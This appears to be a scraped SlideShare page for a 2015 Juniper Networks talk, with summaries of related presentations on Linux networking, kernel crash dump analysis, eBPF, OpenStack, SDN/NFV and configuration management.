Sergei Gotchev, Juniper Networks
Juniper Day, Praha, 13.5.2015
Jestliže SlideShare nezobrazí prezentaci korektně, můžete si ji stáhnout ve formátu .ppsx nebo .pdf (kliknutím na tlačitko v dolní liště snímků).
- The document discusses Linux network stack monitoring and configuration. It begins with definitions of key concepts like RSS, RPS, RFS, LRO, GRO, DCA, XDP and BPF.
- It then provides an overview of how the network stack works from the hardware interrupts and driver level up through routing, TCP/IP and to the socket level.
- Monitoring tools like ethtool, ftrace and /proc/interrupts are described for viewing hardware statistics, software stack traces and interrupt information.
Advanced Tools and Techniques for Troubleshooting NetScaler AppliancesDavid McGeough
This session will cover advanced techniques in troubleshooting the Citrix NetScaler Appliance using tools such as Citrix TaaS, IPMI, nsconmsg, wireshark and log analysis. We will review usages of these tools along with case studies showing how to best troubleshoot common issues seen in operating Citrix NetScaler Appliances.
What you will learn
- Various tools available to troubleshoot issues and how to use them to isolate NetScaler Issues
- Common deployment problems and how to isolate the causes
This document provides an overview of Juniper Networks' high availability and security capabilities for its SRX series firewall and security gateway products. It discusses the SRX architecture including components like IOC, NPC, and SPC cards. It then covers key high availability features like active/active and active/standby redundancy, data and control path separation, load sharing, data synchronization, and stateful failover. The document also reviews troubleshooting techniques, in service software upgrade processes, and a list of features supported by ISSU for different Junos releases.
Este documento describe cómo graficar informes SAR (System Activity Report) utilizando las herramientas KSar y un utilitario en línea. KSar es una aplicación basada en Java que permite generar gráficos a partir de datos SAR almacenados localmente o en otro servidor, mostrando valores como uso de CPU y consumo de RAM. El utilitario en línea permite cargar y visualizar archivos SAR de forma gratuita en un navegador, generando resúmenes e gráficos interactivos de recursos como CPU, carga y RAM.
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
Kernel dump analysis
Cloud this, cloud that…It’s making everything easier, especially for web hosted services. But what about the servers that are not supposed to crash ? For applications making the assumption the OS won’t do any fault or go down, what can you write in your post-mortem once the server froze and has been restarted ? How to track down the bug that lead to service unavailability ?
In this talk, we’ll see how to setup kdump and how to panic a server to generate a coredump. Once you have the vmcore file, how to track the issue with “crash” tool to find why your OS went down. Last but not least : with “crash” you can also modify your live kernel, the same way you would do with gdb.
Adrien Mahieux – System administrator obsessed with performance and uptime, tracking down microseconds from hardware to software since 2011. The application must be seen as a whole to provide efficiently the requested service. This includes searching for bottlenecks and tradeoffs, design issues or hardware optimization.
introduction to linux kernel tcp/ip ptocotol stack monad bobo
This document provides an introduction and overview of the networking code in the Linux kernel source tree. It discusses the different layers including link (L2), network (L3), and transport (L4) layers. It describes the input and output processing, device interfaces, traffic directions, and major developers for each layer. Config and benchmark tools are also mentioned. Resources for further learning about the Linux kernel networking code are provided at the end.
Sergei Gotchev, Juniper Networks
Juniper Day, Praha, 13.5.2015
Jestliže SlideShare nezobrazí prezentaci korektně, můžete si ji stáhnout ve formátu .ppsx nebo .pdf (kliknutím na tlačitko v dolní liště snímků).
- The document discusses Linux network stack monitoring and configuration. It begins with definitions of key concepts like RSS, RPS, RFS, LRO, GRO, DCA, XDP and BPF.
- It then provides an overview of how the network stack works from the hardware interrupts and driver level up through routing, TCP/IP and to the socket level.
- Monitoring tools like ethtool, ftrace and /proc/interrupts are described for viewing hardware statistics, software stack traces and interrupt information.
Advanced Tools and Techniques for Troubleshooting NetScaler AppliancesDavid McGeough
This session will cover advanced techniques in troubleshooting the Citrix NetScaler Appliance using tools such as Citrix TaaS, IPMI, nsconmsg, wireshark and log analysis. We will review usages of these tools along with case studies showing how to best troubleshoot common issues seen in operating Citrix NetScaler Appliances.
What you will learn
- Various tools available to troubleshoot issues and how to use them to isolate NetScaler Issues
- Common deployment problems and how to isolate the causes
This document provides an overview of Juniper Networks' high availability and security capabilities for its SRX series firewall and security gateway products. It discusses the SRX architecture including components like IOC, NPC, and SPC cards. It then covers key high availability features like active/active and active/standby redundancy, data and control path separation, load sharing, data synchronization, and stateful failover. The document also reviews troubleshooting techniques, in service software upgrade processes, and a list of features supported by ISSU for different Junos releases.
Este documento describe cómo graficar informes SAR (System Activity Report) utilizando las herramientas KSar y un utilitario en línea. KSar es una aplicación basada en Java que permite generar gráficos a partir de datos SAR almacenados localmente o en otro servidor, mostrando valores como uso de CPU y consumo de RAM. El utilitario en línea permite cargar y visualizar archivos SAR de forma gratuita en un navegador, generando resúmenes e gráficos interactivos de recursos como CPU, carga y RAM.
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
Kernel dump analysis
Cloud this, cloud that…It’s making everything easier, especially for web hosted services. But what about the servers that are not supposed to crash ? For applications making the assumption the OS won’t do any fault or go down, what can you write in your post-mortem once the server froze and has been restarted ? How to track down the bug that lead to service unavailability ?
In this talk, we’ll see how to setup kdump and how to panic a server to generate a coredump. Once you have the vmcore file, how to track the issue with “crash” tool to find why your OS went down. Last but not least : with “crash” you can also modify your live kernel, the same way you would do with gdb.
Adrien Mahieux – System administrator obsessed with performance and uptime, tracking down microseconds from hardware to software since 2011. The application must be seen as a whole to provide efficiently the requested service. This includes searching for bottlenecks and tradeoffs, design issues or hardware optimization.
introduction to linux kernel tcp/ip ptocotol stack monad bobo
This document provides an introduction and overview of the networking code in the Linux kernel source tree. It discusses the different layers including link (L2), network (L3), and transport (L4) layers. It describes the input and output processing, device interfaces, traffic directions, and major developers for each layer. Config and benchmark tools are also mentioned. Resources for further learning about the Linux kernel networking code are provided at the end.
The document discusses analyzing Linux kernel crash dumps. It covers various ways to gather crash data like serial console, netconsole, kmsg dumpers, Kdump, and Pstore. It then discusses analyzing the crashed kernel using tools like ksymoops, crash utility, and examining the backtrace, kernel logs, processes, and file descriptors. The document provides examples of gathering data from Pstore and using commands like bt, log, and ps with the crash utility to extract information from a crash dump.
Accelerated Linux Core Dump Analysis training public slidesDmitry Vostokov
The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
This document discusses file systems and distributed file systems. It describes how file systems work, including hardware, partitions, logical volume management (LVM), and basic and distributed file systems. It focuses on GlusterFS and NFS distributed file systems. GlusterFS allows various volume types including distributed, replicated, distributed-replicated and stripe. NFS provides network access but no redundancy. The document also discusses storage solutions for AI training workloads, including Pure Storage FlashBlade and AIRI systems optimized for high-performance needs of AI.
Building IAM for OpenStack, presented at CIS (Cloud Identity Summit) 2015.
Discuss Identity Sources, Authentication, Managing Access and Federating Identities
Systemd is an init system that replaces traditional init daemons. It allows for parallel startup of services through dependency-based activation of units which encapsulate system objects like services, devices, and mounts. Systemd also provides on-demand activation of services through sockets, buses, devices, and file paths. It aims to be backwards compatible with System V while offering improvements like parallel startup and centralized logging.
USENIX LISA2021 talk by Brendan Gregg (https://www.youtube.com/watch?v=_5Z2AU7QTH4). This talk is a deep dive that describes how BPF (eBPF) works internally on Linux, and dissects some modern performance observability tools. Details covered include the kernel BPF implementation: the verifier, JIT compilation, and the BPF execution environment; the BPF instruction set; different event sources; and how BPF is used by user space, using bpftrace programs as an example. This includes showing how bpftrace is compiled to LLVM IR and then BPF bytecode, and how per-event data and aggregated map data are fetched from the kernel.
A Deep Dive into macOS MDM (and How it can be Compromised)Priyanka Aash
This document provides an overview of macOS MDM (Mobile Device Management) and DEP (Device Enrollment Program) protocols. It describes the 7 key steps in the enrollment process: 1) device record creation, 2) assignment, 3) sync, 4) check-in, 5) profile retrieval, 6) profile installation, and 7) listening for MDM commands. It then details a vulnerability in the "InstallApplication" command that could allow a man-in-the-middle attack and demonstrates an exploit. Recommendations are provided for Apple and MDM vendors to improve security, such as requiring pinning and revocation checks.
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi SubsystemDheryta Jaisinghani
While we understand the complex interplay of OSI layers, in theory, in practice understanding their implementation is a non-trivial task. The implementation details that enables a network interface card to communicate with its peers are oblivious to the end-users. Developers venturing into this domain for the first time often find it hard to find relevant tutorials that enable them to understand these implementation details. The aim of this talk is to provide an overview of WiFi Subsystem implemented in the Linux operating system. Specifically, this talk will explain the sequence of events that occur from application layer till physical layer when a connection is established over WiFi. After this talk, the audience will understand
(1) the bird's eye view of Linux WiFi Subsystem,
(2) what happens in an operating system when a WiFi card is plugged-in,
(3) how is a packet received/transmitted from physical layer to operating system kernel and vice-versa,
(4) brief overview of code structure of open-source drivers, and lastly
(5) important pointers to kick start driver code modifications.
Video Available here: https://www.youtube.com/watch?v=pa1oEyc7Dm0
The Linux kernel is undergoing the most fundamental architecture evolution in history and is becoming a microkernel. Why is the Linux kernel evolving into a microkernel? The potentially biggest fundamental change ever happening to the Linux kernel. This talk covers how companies like Facebook and Google use BPF to patch 0-day exploits, how BPF will change the way features are added to the kernel forever, and how BPF is introducing a new type of application deployment method for the Linux kernel.
This document discusses KVM virtualization and why it is considered the best platform. It states that KVM provides high performance, strong security through EAL4+ certification and SE Linux, and can save customers up to 70% on costs compared to other solutions. It also supports various operating systems and works with Red Hat products like OpenStack and Red Hat Enterprise Virtualization for managing virtualization. Charts are included showing KVM outperforming VMware on benchmark tests using different CPU core counts.
This document provides an overview of a PowerShell Basics training session. It discusses the curriculum, which will cover topics like the basics of PowerShell, cmdlets, piping, and scripting over 4 days. It highlights why PowerShell is useful for system administrators by providing a simplified syntax and being more secure than VBScript. PowerShell allows familiar commands and integrates with Microsoft products like Windows, Exchange, and SQL Server.
Lesson 2 Understanding Linux File SystemSadia Bashir
The document provides an overview of Linux file systems and file types. It discusses:
1) The main types of files in Linux including directories, special files, links, sockets and pipes.
2) The standard Linux directory structure and the purpose of directories like /bin, /sbin, /etc, and /usr.
3) Common Linux file extensions and hidden files that begin with a dot.
4) Environment variables and how they can be used to customize a system.
5) Symbolic links and how they create references to files without copying the actual file.
The document provides information about RPM (Red Hat Package Manager), including that it is the default package management system for Red Hat-based Linux distributions. It describes how RPM allows users to install, update, uninstall, query, verify and manage software packages. It also provides examples of common RPM commands and their usage, such as installing, upgrading, verifying, and querying packages.
This document discusses Linux kernel crash capture and analysis. It begins with an overview of what constitutes a kernel crash and reasons crashes may occur, both from hardware and software issues. It then covers using kdump to capture virtual memory cores (vmcores) when a crash happens, and configuring kdump for optimal core collection. Finally, it discusses analyzing vmcores after collection using the crash utility, including commands to inspect system information, backtraces, logs, and more.
This document provides an overview of advanced Docker topics including Docker installation, Docker networking using bridges and volumes, and creating Dockerfiles. It discusses installing Docker on CentOS, the different types of Docker networks including bridge, host, overlay and macvlan. It also covers creating and managing Docker volumes, starting containers with volumes, and creating Dockerfiles with components like FROM, RUN, COPY and ENTRYPOINT.
Introduction to the new MediaTek LinkIt™ Development Platform for RTOSMediaTek Labs
The new MediaTek LinkIt™ Development Platform for RTOS is based on ARM Cortex-M4 MCU architecture and provides leading features for the creation of connected appliances, home and office automation devices, smart gadgets, and IoT bridges. Supporting a range of chipsets (initially the MediaTek MT7687F), LinkIt for RTOS offers the convenience of a single toolset and common API implemented over a popular RTOS. With this you can achieve economies across a full range of consumer and business IoT devices. The platform consists of a Software Development Kit (SDK), Hardware Development Kits (HDKs), including modules from supply chain partners, and related technical documentation. The first release of the platform supports the MediaTek MT7687F Wi-Fi SOC which has a 192 MHz MCU, 1×1 802.11b/g/n Wi-Fi subsystem, integrated security engine (AES and 3DES/SHA), embedded SRAM/ROM and 2MB flash. The new platform uses FreeRTOS with open-source modules for TCP/IP, SSL/TLS, HTTP (client and server), SNTP, DHCP daemon, MQTT, XML and JSON. Development and debugging is supported by free command line tools, plus a KEIL plug-in.
SLSA - An End-to-End Framework for Supply Chain IntegritySakha Global
One of the biggest challenges for software developers is the need to make informed choices about the external software and products they use in their own software systems. Evaluating whether a given system is appropriately secured can be challenging, especially if it’s external or owned by a third party.
This so-called software supply chain has been under increasing scrutiny in recent years, with attacks on software systems being responsible for damages to both public and private interests. In collaboration with the Open Source Security Foundation (OpenSSF), Google has proposed Supply-chain Levels for Software Artifacts (SLSA). The new SLSA framework formalizes criteria around software supply chain integrity, to help the industry and open-source ecosystem secure the software development lifecycle.
SLSA (pronounced "salsa") is a security framework from source to service, giving anyone working with software a common language for increasing levels of software security and supply chain integrity. It’s how you get from safe enough to being as resilient as possible, at any link in the chain.
This SlideShare explores the concept of SLSA in brief.
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, and why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk will explain the principles of eBPF and its concrete advantages to connect and secure Cloud Native applications.
This talk will explain what is eBPF, why it is revolutionary is several fields, give examples of tools using eBPF and what they gain from it, and open up to the future of that technology.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux for to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that have been written in the past 12 months for performance analysis that use BPF. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funcccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
This document provides a tutorial on NETCONF and YANG, which are standards for network configuration and management. NETCONF was designed to address operators' requirements for easier network-wide configuration, validation of changes, and transactional management across multiple devices. It uses SSH for secure transport and XML encoding. YANG provides data models to define the configuration and state data. The tutorial covers the background and motivation for these standards, an overview of NETCONF operations and examples, and a demonstration of YANG data modeling. It explains how NETCONF enables network-wide atomic transactions, fulfilling a key operator need and improving the cost and complexity of network management.
Open source policy open daylight and opflexbelaire11
Presentation of an approach to building an OpFlex Agent, which operates in an OpenDaylight and/or OpenStack infrastructure using OVS. This will be presented at LinuxCon in Chicago (August 2014).
The document discusses analyzing Linux kernel crash dumps. It covers various ways to gather crash data like serial console, netconsole, kmsg dumpers, Kdump, and Pstore. It then discusses analyzing the crashed kernel using tools like ksymoops, crash utility, and examining the backtrace, kernel logs, processes, and file descriptors. The document provides examples of gathering data from Pstore and using commands like bt, log, and ps with the crash utility to extract information from a crash dump.
Accelerated Linux Core Dump Analysis training public slidesDmitry Vostokov
The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
This document discusses file systems and distributed file systems. It describes how file systems work, including hardware, partitions, logical volume management (LVM), and basic and distributed file systems. It focuses on GlusterFS and NFS distributed file systems. GlusterFS allows various volume types including distributed, replicated, distributed-replicated and stripe. NFS provides network access but no redundancy. The document also discusses storage solutions for AI training workloads, including Pure Storage FlashBlade and AIRI systems optimized for high-performance needs of AI.
Building IAM for OpenStack, presented at CIS (Cloud Identity Summit) 2015.
Discuss Identity Sources, Authentication, Managing Access and Federating Identities
Systemd is an init system that replaces traditional init daemons. It allows for parallel startup of services through dependency-based activation of units which encapsulate system objects like services, devices, and mounts. Systemd also provides on-demand activation of services through sockets, buses, devices, and file paths. It aims to be backwards compatible with System V while offering improvements like parallel startup and centralized logging.
USENIX LISA2021 talk by Brendan Gregg (https://www.youtube.com/watch?v=_5Z2AU7QTH4). This talk is a deep dive that describes how BPF (eBPF) works internally on Linux, and dissects some modern performance observability tools. Details covered include the kernel BPF implementation: the verifier, JIT compilation, and the BPF execution environment; the BPF instruction set; different event sources; and how BPF is used by user space, using bpftrace programs as an example. This includes showing how bpftrace is compiled to LLVM IR and then BPF bytecode, and how per-event data and aggregated map data are fetched from the kernel.
A Deep Dive into macOS MDM (and How it can be Compromised)Priyanka Aash
This document provides an overview of macOS MDM (Mobile Device Management) and DEP (Device Enrollment Program) protocols. It describes the 7 key steps in the enrollment process: 1) device record creation, 2) assignment, 3) sync, 4) check-in, 5) profile retrieval, 6) profile installation, and 7) listening for MDM commands. It then details a vulnerability in the "InstallApplication" command that could allow a man-in-the-middle attack and demonstrates an exploit. Recommendations are provided for Apple and MDM vendors to improve security, such as requiring pinning and revocation checks.
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi SubsystemDheryta Jaisinghani
While we understand the complex interplay of OSI layers, in theory, in practice understanding their implementation is a non-trivial task. The implementation details that enables a network interface card to communicate with its peers are oblivious to the end-users. Developers venturing into this domain for the first time often find it hard to find relevant tutorials that enable them to understand these implementation details. The aim of this talk is to provide an overview of WiFi Subsystem implemented in the Linux operating system. Specifically, this talk will explain the sequence of events that occur from application layer till physical layer when a connection is established over WiFi. After this talk, the audience will understand
(1) the bird's eye view of Linux WiFi Subsystem,
(2) what happens in an operating system when a WiFi card is plugged-in,
(3) how is a packet received/transmitted from physical layer to operating system kernel and vice-versa,
(4) brief overview of code structure of open-source drivers, and lastly
(5) important pointers to kick start driver code modifications.
Video Available here: https://www.youtube.com/watch?v=pa1oEyc7Dm0
The Linux kernel is undergoing the most fundamental architecture evolution in history and is becoming a microkernel. Why is the Linux kernel evolving into a microkernel? The potentially biggest fundamental change ever happening to the Linux kernel. This talk covers how companies like Facebook and Google use BPF to patch 0-day exploits, how BPF will change the way features are added to the kernel forever, and how BPF is introducing a new type of application deployment method for the Linux kernel.
This document discusses KVM virtualization and why it is considered the best platform. It states that KVM provides high performance, strong security through EAL4+ certification and SE Linux, and can save customers up to 70% on costs compared to other solutions. It also supports various operating systems and works with Red Hat products like OpenStack and Red Hat Enterprise Virtualization for managing virtualization. Charts are included showing KVM outperforming VMware on benchmark tests using different CPU core counts.
This document provides an overview of a PowerShell Basics training session. It discusses the curriculum, which will cover topics like the basics of PowerShell, cmdlets, piping, and scripting over 4 days. It highlights why PowerShell is useful for system administrators by providing a simplified syntax and being more secure than VBScript. PowerShell allows familiar commands and integrates with Microsoft products like Windows, Exchange, and SQL Server.
Lesson 2 Understanding Linux File SystemSadia Bashir
The document provides an overview of Linux file systems and file types. It discusses:
1) The main types of files in Linux including directories, special files, links, sockets and pipes.
2) The standard Linux directory structure and the purpose of directories like /bin, /sbin, /etc, and /usr.
3) Common Linux file extensions and hidden files that begin with a dot.
4) Environment variables and how they can be used to customize a system.
5) Symbolic links and how they create references to files without copying the actual file.
The document provides information about RPM (Red Hat Package Manager), including that it is the default package management system for Red Hat-based Linux distributions. It describes how RPM allows users to install, update, uninstall, query, verify and manage software packages. It also provides examples of common RPM commands and their usage, such as installing, upgrading, verifying, and querying packages.
This document discusses Linux kernel crash capture and analysis. It begins with an overview of what constitutes a kernel crash and reasons crashes may occur, both from hardware and software issues. It then covers using kdump to capture virtual memory cores (vmcores) when a crash happens, and configuring kdump for optimal core collection. Finally, it discusses analyzing vmcores after collection using the crash utility, including commands to inspect system information, backtraces, logs, and more.
This document provides an overview of advanced Docker topics including Docker installation, Docker networking using bridges and volumes, and creating Dockerfiles. It discusses installing Docker on CentOS, the different types of Docker networks including bridge, host, overlay and macvlan. It also covers creating and managing Docker volumes, starting containers with volumes, and creating Dockerfiles with components like FROM, RUN, COPY and ENTRYPOINT.
Introduction to the new MediaTek LinkIt™ Development Platform for RTOSMediaTek Labs
The new MediaTek LinkIt™ Development Platform for RTOS is based on ARM Cortex-M4 MCU architecture and provides leading features for the creation of connected appliances, home and office automation devices, smart gadgets, and IoT bridges. Supporting a range of chipsets (initially the MediaTek MT7687F), LinkIt for RTOS offers the convenience of a single toolset and common API implemented over a popular RTOS. With this you can achieve economies across a full range of consumer and business IoT devices. The platform consists of a Software Development Kit (SDK), Hardware Development Kits (HDKs), including modules from supply chain partners, and related technical documentation. The first release of the platform supports the MediaTek MT7687F Wi-Fi SOC which has a 192 MHz MCU, 1×1 802.11b/g/n Wi-Fi subsystem, integrated security engine (AES and 3DES/SHA), embedded SRAM/ROM and 2MB flash. The new platform uses FreeRTOS with open-source modules for TCP/IP, SSL/TLS, HTTP (client and server), SNTP, DHCP daemon, MQTT, XML and JSON. Development and debugging is supported by free command line tools, plus a KEIL plug-in.
SLSA - An End-to-End Framework for Supply Chain IntegritySakha Global
One of the biggest challenges for software developers is the need to make informed choices about the external software and products they use in their own software systems. Evaluating whether a given system is appropriately secured can be challenging, especially if it’s external or owned by a third party.
This so-called software supply chain has been under increasing scrutiny in recent years, with attacks on software systems being responsible for damages to both public and private interests. In collaboration with the Open Source Security Foundation (OpenSSF), Google has proposed Supply-chain Levels for Software Artifacts (SLSA). The new SLSA framework formalizes criteria around software supply chain integrity, to help the industry and open-source ecosystem secure the software development lifecycle.
SLSA (pronounced "salsa") is a security framework from source to service, giving anyone working with software a common language for increasing levels of software security and supply chain integrity. It’s how you get from safe enough to being as resilient as possible, at any link in the chain.
This SlideShare explores the concept of SLSA in brief.
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, and why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk will explain the principles of eBPF and its concrete advantages to connect and secure Cloud Native applications.
This talk will explain what is eBPF, why it is revolutionary is several fields, give examples of tools using eBPF and what they gain from it, and open up to the future of that technology.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux for to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that have been written in the past 12 months for performance analysis that use BPF. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funcccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
This document provides a tutorial on NETCONF and YANG, which are standards for network configuration and management. NETCONF was designed to address operators' requirements for easier network-wide configuration, validation of changes, and transactional management across multiple devices. It uses SSH for secure transport and XML encoding. YANG provides data models to define the configuration and state data. The tutorial covers the background and motivation for these standards, an overview of NETCONF operations and examples, and a demonstration of YANG data modeling. It explains how NETCONF enables network-wide atomic transactions, fulfilling a key operator need and improving the cost and complexity of network management.
Open source policy open daylight and opflexbelaire11
Presentation of an approach to building an OpFlex Agent, which operates in an OpenDaylight and/or OpenStack infrastructure using OVS. This will be presented at LinuxCon in Chicago (August 2014).
Non-Fluff Software Defined Networking, Network Function Virtualization and IoTMark Ryan Castellani
This document provides an overview of SDN and NFV, including:
- SDN advocates replacing standardized networking protocols with centralized software applications that configure network elements. NFV advocates replacing hardware network elements with software running on commercial off-the-shelf servers.
- SDN and NFV allow for faster deployment of new services and relocation of network functions for optimization of resources. They facilitate service chaining through centralized policy configuration.
- A taxonomy is presented that distinguishes between trends in computational communications, hardware/software implementation, device programmability, and functional location.
Open Source and Cloud: Change Through CollaborationOPNFV
In recent years as virtualization and cloud became more and more mature an opportunity has been created for the industry to move towards an NFV networking methodology. In parallel with this phenomenon the role of open source has evolved to establish a fundamentally new paradigm for software development. The ICT industry has had to adapt to this change and move away from traditional ways of working.
During this presentation we will share some of our experience of the cloud market including SDN and NFV. We intend to shed light on some of the challenges faced and what lessons learnt on the path toward collaborative standardization and open source development. We will also highlight the importance of OPNFV and its role as an avenue to upstream communities for both investigation and cooperation
Deploying OpenStack with Cisco Networking, Compute and StorageLora O'Haver
Cisco offers solutions for deploying OpenStack with Cisco compute, network, and storage technologies. Key elements include Cisco's participation in the OpenStack community, Cisco OpenStack engineering efforts, and Cisco technology partnerships with companies providing OpenStack platforms. Cisco provides unified management of compute and network resources through Cisco UCS.
This document provides a summary of a YANG tutorial presentation on advanced YANG statements, including must statements, augment statements, when statements, choice statements, identity statements, feature statements, deviations, and YANG modeling strategies. It discusses topics like restricting valid values with XPath expressions in must statements, adding new data with augment statements, making data conditional with when statements, modeling related enumerations with identity statements, and marking data as optional with feature statements. The presentation aims to help people understand and properly apply these important YANG modeling constructs.
Synopsis: A discussion of the requirements for next generation network management identified in RFC 3535 which lead to the development of NETCONF and YANG.
Synopsis: Part 1 of a tutorial on the YANG data modeling language. The basics of YANG are taught in this module. More advanced YANG statements are taught in Part 2.
SDN & NFV Introduction - Open Source Data Center NetworkingThomas Graf
This document introduces software defined networking (SDN) and network functions virtualization (NFV) concepts. It discusses challenges with traditional networking and how SDN and NFV address these by decoupling the control and data planes, centralizing network intelligence, and abstracting the underlying network infrastructure. It then provides examples of open source SDN technologies like OpenDaylight, Open vSwitch, and OpenStack that can be used to build programmable software-defined networks and virtualized network functions.
What is NFV? How does it relate to SDN, what does it mean for the telecommunications industry, and why should anyone outside of that industry care?
Presentation delivered at CloudOpen Europe, Düsseldorf, October 2014
An introduction to the key concepts of SDN and NFV with visuals of:
- How SDN is transforming the Data Center
- How NFV is transforming the Service Provider domain and the End-customer domain
- Objectives
- Origin
- Ambassadors
- Applicability
- Analogies
- Benefits
- Industry Standards
- Drivers
- Obstacles
- Growth
- Resources and Events
Agile OpenStack Networking with Cisco SolutionsCisco DevNet
A session in the DevNet Zone at Cisco Live, Berlin. One of the key areas of contributions from Cisco within OpenStack has been in the evolution and the development of the OpenStack Networking Service - Neutron. Using Neutron's Modular Layer 2 (ML2) plug-in and advanced services framework, Cisco has integrated products and solutions with the networking service to simplify the deployment of highly scalable, manageable and performant networks. Through this session we will cover and provide details of reference as well as the various OpenStack Neutron plugins/drivers for hardware and software Cisco products including the Nexus 1k/3k/5k/6k/7k/9k, UCS FI, CSR 1kv, ASR1K, CPNR and Application Policy Infrastructure Controller (APIC). The audience will also learn about Group Based Policy API in OpenStack that is based on the ACI Policy model. We will further discuss different OpenStack networking architecture, deployments and understand Cisco’s community code contribution that enable and support IPv6 and NFV related features in Neutron.
NFV : Virtual Network Function Architecturesidneel
This document discusses network function virtualization (NFV) and virtual network functions (VNFs). It covers the overview of VNF architecture in the NFV framework, including VNF design patterns, properties, lifecycle, and fault management. VNFs are software implementations of network functions that run over NFV infrastructure and are orchestrated by NFV orchestrators and VNF managers. A VNF consists of one or more VNF components that have well-defined interfaces and can be deployed, managed, and upgraded independently. The document describes the various states, interfaces, and descriptors involved in the lifecycle of VNF instantiation, scaling, updating and upgrading.
An introductory slides for explaining the SDN and NFV technologies. what's the difference between them and when each one is used. Also it talk about some of Cisco products in each area either SDN or NFV or the Automation with some of real use cases deployed in today's service provider network.
Hope you like it
SDN & NFV Introduction (SDN NFV Day ITB 2016)SDNRG ITB
The document discusses Software Defined Networking (SDN) and Network Function Virtualization (NFV). It provides a short introduction to SDN and NFV, including what they are, why they were developed, and how they work. It then discusses some key points about SDN, such as how it involves computing a function on an abstract network and how network virtualization is a major use case. Finally, it discusses real world examples of SDN deployment today and the business drivers for organizations to adopt SDN technologies in a aggressive timelines.
This document provides an introduction to OpenFlow, SDN, and NFV. It describes the need for new networking paradigms and outlines some of the key problems with traditional networking approaches. OpenFlow is presented as providing open interfaces and programmability to network nodes. SDN is defined as separating the control logic from the forwarding plane and enabling programmable automation through open APIs. NFV aims to virtualize network functions to improve flexibility, reduce costs, and accelerate service deployment using standard IT virtualization technologies.
Rudder is an easy to use, web-driven, role-based solution for IT Infrastructure Automation and Compliance. With a focus on continuously checking configurations and centralising real-time status data, Rudder can show a high-level summary (“ISO 27001 rules are at 100%!”) and break down noncompliance issues to a deep technical level (“Host prod-web-03: SSH server configuration allows root logins”).
A few things that make Rudder stand out:
- A simple framework allows you to extend the built-in rules to implement specific low-level configuration patterns, however complex they may be, using simple building blocks (“ensure package installed in version X,” “ensure file content,” “ensure line in file,” etc.). A graphical builder lowers the technical level required to use this.
- Each policy can be independently set to be automatically checked or enforced on a policy or host level. In Enforce mode, each remediation action is recorded, showing the value of these invisible fixes.
